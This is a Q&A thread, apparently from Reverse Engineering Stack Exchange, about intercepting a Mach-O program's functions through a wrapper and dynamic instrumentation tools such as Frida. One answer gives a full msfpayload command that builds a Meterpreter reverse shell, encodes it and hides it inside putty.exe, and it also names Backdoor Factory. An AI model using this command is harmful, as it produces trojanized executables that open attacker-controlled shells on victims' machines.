# Can one modify a program by "wrapping" its binary? What tools exist?

Tags: tools, c, executable, osx, mach-o

(This question is related to [How do I add functionality to an existing binary executable?](https://reverseengineering.stackexchange.com/q/185)).

I too would like to add functionality to an existing application, but I do not want to modify the original binary.

I imagine that, for some "well-behaved" compiled code, it ought to be possible to create a "wrapper" program that:

1. maps the original binary's segments into its own memory space; and
2. places its own redefined functions at the relevant addresses.

For example, suppose that loading the original binary would place `void origfunction(int, int)` at location `0x1234`; my thought is that loading the wrapper might cause that function's machine code (from the original binary) to be loaded at `0x5678` with `void newfunction(int, int)` loaded at `0x1234` in its place.  `newfunction` could then make a call to `origfunction` before/after performing its modifications.

**Is this approach feasible?  If not, why not?**

If it is feasible, are there any tools that can assist in automating the generation of such a wrapper program?  Generic answers would be most useful for future readers, but the original binary that I am working with right now is a fairly typical OS X one (Mach-O format, compiled from Objective-C).

Answer (score 3):

Dynamic instrumentation tools like [Frida](https://www.frida.re/docs/installation/) or [DynomoRIO](http://www.dynamorio.org/) are probably your best bet. Traditional code injection approaches like [mach_inject](https://github.com/rentzsch/mach_inject) on os x or [detours](http://research.microsoft.com/en-us/projects/detours/) on windows are things you could look into as well.

Comment: I suppose mentioning **pin** (which does not seem to be available anymore on MacOSX) and **DynomoRIO**, one could also add [cycript](http://www.cycript.org/) to that list. It works remarkably well, though seems mostly undocumented.

Answer (score 1):

Some of the tools i know of:

1. Backdoor Factory: https://github.com/secretsquirrel/the-backdoor-factory
2. Use Metasploit msfencode:

   `msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe`

Backdoor Factory support a varity of binaries such as ELF, Mach-O, PE.

Comment: Unless I've misunderstood, both those solutions appear to *statically* modify the underlying binary (which is something that I do not want to do).  I am looking for tools through which one can create an executable that will *dynamically* load the original binary yet intercept its function calls.  Or have I missed something?

Comment: @eggyal: You are correct. I misunderstood the question, sorry.